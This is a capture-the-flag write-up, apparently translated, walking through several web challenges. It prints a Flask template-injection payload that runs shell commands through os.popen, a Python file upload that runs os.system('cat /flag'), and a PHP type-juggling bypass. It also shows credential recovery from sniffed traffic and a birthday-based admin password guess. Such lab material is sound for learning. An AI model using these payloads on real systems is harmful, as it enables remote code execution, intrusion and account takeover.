Title: ctf's WEB Exercise III

Question name: Simple_SSTI_2 Question wirteup: starts the question scenario, obtains the shooting range website, visits the website, and the page shows that the URL connection needs to be connected to a flag parameter http://114.67.246.176:19131/ According to the content of the question, this question is an ssti vulnerability. Here is the ssti construct, the parameter construct flag={{3+2}}, an error is reported, and it is flaskhttp://114.67.246.176:19131/?flag={{3+2}} also tried to construct flag={{3*2}}, and found that the page shows 6. Prove that there is an ssti vulnerability in the system http://114.67.246.176:19131/?flag={{3*2}} View the configuration information of flask through the config variable, and there is no available point http://114.67.246.176:19131/?flag={{config}} Pass {{ config.__class__.__init__.__globals__['os'].popen('ls ./').read() }}Read the system file, read the website system directory here, and find some folders. Enter one by one to view. I found that the first app folder I saw has flag##__class__: used to view the class to which the variable belongs. According to the previous variable form, you can get the class to which it belongs. ##__init__ Initialize the class, the returned type is function##__globals__[] The usage method is function name.__globals__ Get the module, method and all variables that can be used in the space where the function is located. The ##os.popen() method is used to open a pipeline from a command.

The ##open() method is used to open a file and return the file object http://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20./%27).read()%20}} By {{ config.__class__.__init__.__globals__['os'].popen('ls ./app').read() }}Read the file in the app directory and find that there is a flag file http://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20./app%27).read()%20}} By {{ config.__class__.__init__.__globals__['os'].popen('cat ./app/flag').read() }}Read flag contenthttp://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20./app/flag%27).read()%20}} Finally get flag:flag{fcf301ac393f2215b3664d749c2d875e}Title name: Flask_FileUpload question witeup:http://114.67.246.176:12896/ The file upload page was viewed in source code and found that only the jpg and png file name formats are allowed to be uploaded, and the file content will be executed by python view-source:http://114.67.246.176:12896/system function can convert strings into commands to run on the server; the principle is that when each system function is executed, it will create a child process to execute the command line on the system, and the execution result of the child process cannot affect the main process; the os.system method is the most basic method of the os module, and other methods are generally encapsulated based on this method. Here, use the system function in python's os package to read flags. Here upload a test.jpg, which is to read the website root directory import os

os.system('ls /')

Upload successfully, check the source code, find that the root directory of the system website exists, and also find that the root directory contains flag files

View flag

import os

os.system('cat /flag')

Upload successfully, check the source code, and find the flag content Finally flag:flag{e541f3aadc9575ed6b6832b7ca34e327} Question name: Calculator Question content: You can get the flag question writeup: other question scenarios, get the shooting range website, visit the website, find that you need to enter the correct verification code to get the flag, pass the f12 element review, view the source code contains a code.jshttp://114.67.246.176:16139/View code.js, find the flag content http://114.67.246.176:16139/js/code.js Finally got flag:flag{e5d6e3fe29850f7fec9ea6ef55f86050} Question name: GET Question content: flag{} Question wirteup: starts the question scene, gets the shooting range website, visits the website, a php code is displayed on the page http://114.67.246.176:13678/ performs a simple code audit, and finds that passes http What parameter variable of get method. When what parameter variable is equal to flag, then flag is output. Here is a structure:what=flag, you can get flaghttp://114.67.246.176:13678/?what=flag Flag:flag{54790dba4001f7ded2ebde88ca82a3ca} Question name: POST question writeup: starts the question scenario, get the shooting range website, visit the website, find a php code http://114.67.246.176:15053/ performs a simple code audit, and finds that the http post is passed What parameter variable of get method. When what parameter variable is equal to flag, then flag is output. Here is a structure: http://114.67.246.176:15053/post:what=flag You can get flag final flag:flag{4335dd4cc76278468578d8026fb121ae}

Question name: Contradictory Question writeup: starts the question scenario, obtains the shooting range website, visits the website, and finds that it is a php code Through a simple analysis of the code, we can find that a parameter num is passed, which involves a function is_numeric. This function detects whether the variable is a number or a string. If it is a number and a string, it returns TRUE, otherwise it returns FALSE.

This statement means that the num parameter to be passed in is neither a numeric string and is equal to 1.'

The determination of num==1 is two equal signs, which is a weak type comparison. If the two sides of the equal sign are different, it will be converted to the same type before comparison.

Under weak type comparison, when a string is compared with a number, the string is converted into a number, specifically retaining the number before the letter. For example, 123ab7c will be converted to 123, ab7c will be converted to 0. (There is no number before the letter, it is 0), so, construct:num=1a, you can get flag

http://114.67.246.176:16671/?num=1a

Finally flag:flag{d95c4676fd2740a47e0393cf3364e3e3} Question name: alert Question content: flag{} Question wireup: starts the scene, gets the shooting range website, opens the page, and finds that it is an unlimited pop-up windowhttp://114.67.246.176:15743/ accesses it through source code, and checks the web page source code, and finds that there is a unicode encoding starting with # in the comment through online unicode decryption, obtains flag content http://tool.chinaz.com/tools/unicode.aspx Finally flag:flag{09eec7218f68c04c87093052720c2c11}Question name: You must let him stop the question wireup: start the question scene, get the shooting range website, visit the website, and the page keeps refreshing the pictures Check the source code of the page, and did not find the flag, but there is a scipt script that keeps refreshing the page Catch the packets through bupsuit, and then we send the data packet go repeatedly, and finally see the flag content on the response page Final flag:flag{ff9acfa3bbec16fe29b3ad5aef8f5421} Question name: Social Worker - Preliminary collection of question content: It is actually a miscellaneous item, so I can only be considered a social worker. From the practical question of that year, I started the question scenario, obtained the shooting range website, visited the website, and found that it was a drill brushing website http://114.67.246.176:13506/#goumai Catalog scan of its target shooting range website through Yujian, and found that there was an admin backend. accessed the admin directory, and there was indeed a backend. http://114.67.246.176:13506/admin/login.php At the bottom of the homepage of the shooting range, you can download the auxiliary. Here I can download it.

After decompression, then run the drilling program in the virtual machine.

After entering the qq and password, clicking to start, and using wrishark to analyze the packet, I found a pop-up window "Haha, I'm cheating with a little unique person"

If you observe the packets carefully, you will find that there is a packet email and a Base64 encrypted Pass.

The decryption of base64 successfully seems to be a password, it is too long, but it wants to authorize the code.

Open Foxmail to log in, enter your email address, and then enter your authorization code to log in.

View your inbox, sort by "topic", and find an email with available information

You can see that the sender is Mara

The delivery time is 2021, now I am 20 years old, and I can be judged to be born in 2001

It is also said that it was the birthday two days ago, so you can judge that the birthday is February 6th

Try logging in and enter: username mara, password is maryy's birthday number: 20010206

Log in to the system successfully, check the website settings in the website background---player key, and you can get the flag

Finally get flag:flag{c4cba16a2f1a2d5aedf2ddd90a6bd04f} Question name: game1 Question wirtup: Start the question scene, get the shooting range website, visit the website, find a game to get the highest score, you can get the flag. You can play any game here. http://114.67.246.176:17941/?s=1629731758384 Then, before the game ends, it is analyzed by bupsuit, and found that the results are related to the values of the three parameters of source, ip and sing. http://114.67.246.176:17941/score.php?score=50ip=183.221.17.223sign=zMNTA===